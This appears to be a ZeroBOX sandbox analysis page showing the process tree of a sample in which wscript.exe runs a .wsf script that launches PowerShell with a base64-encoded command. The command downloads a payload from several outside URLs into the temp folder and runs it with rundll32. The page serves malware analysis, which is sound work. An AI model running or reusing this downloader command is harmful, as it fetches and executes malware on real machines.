popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Wmap.wsf

    1932

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQATQBhAGkAbQBlAHIAcwAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAG0AbQBoAGgAZgAuAGMAbwBtAC8AYwB5AG8AYQBMAEMAagAvAEoAQwA5AG8AOABmAG4AbgBsADkASQAsAGgAdAB0AHAAcwA6AC8ALwBiAHkAdABlAGQAZQBzAGkAZwBuAC4AbgBlAHQALwB2AFAAcQB5AFcAeABiAC8AMAAyADAANAAyADMALgBnAGkAZgAsAGgAdAB0AHAAcwA6AC8ALwByAHoAYgBwAG8ALgBjAG8AbQAuAGIAcgAvADAATQBxAGEARQAvAGIAbgBzADcAZwA5ACwAaAB0AHQAcABzADoALwAvAGEAbABvAHMAdABvAG8AbAAtAHMAYQAuAGMAbwBtAC8AWABzAFgAWQBvAGQALwBiAE8AUABVAEQAZQBhACwAaAB0AHQAcABzADoALwAvAG4AZQB0AHUAbAB0AHIAYQAuAGMAbwBtAC4AYgByAC8AYgBTAHEAQQBNAGkALwBWADQAbQBRADcAOQBQAEUALABoAHQAdABwAHMAOgAvAC8AcwBvAGEAcgBlAHMAZABlAHMAaQBnAG4AZQByAC4AYwBvAG0ALgBiAHIALwBRAGsAUwB3AHAAOAAvAEYAMQBrAFYAcABXAFEAdgBXACwAaAB0AHQAcABzADoALwAvAGcAcgBhAHAAaABpAHgAYwByAGUAYQB0AGkAdgBpAHQAeQAuAGMAbwBtAC8ATQBvAEoAQgBRAC8AOQBQAE4AUgBEADYAeAAsAGgAdAB0AHAAcwA6AC8ALwBzAHQAcgBhAGcAaQBjAGkAYQBuAC4AYwBvAG0ALwB1AHEANgAzAGwALwBLADMASQB0AEIASwBOACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEEAbgB0AGkAYgBpAG8AdABpAGMAIABpAG4AIAAkAE0AYQBpAG0AZQByAHMAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAEEAbgB0AGkAYgBpAG8AdABpAGMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAEEAbgB0AGkAZQBwAGkAcwBjAG8AcABhAGwAQQBwAG8AegBlAG0AYQAuAE4AbwBtAGUAaQBkAGEAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEEAbgB0AGkAZQBwAGkAcwBjAG8AcABhAGwAQQBwAG8AegBlAG0AYQAuAE4AbwBtAGUAaQBkAGEAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABBAG4AdABpAGUAcABpAHMAYwBvAHAAYQBsAEEAcABvAHoAZQBtAGEALgBOAG8AbQBlAGkAZABhAGUALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA="

      2084

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf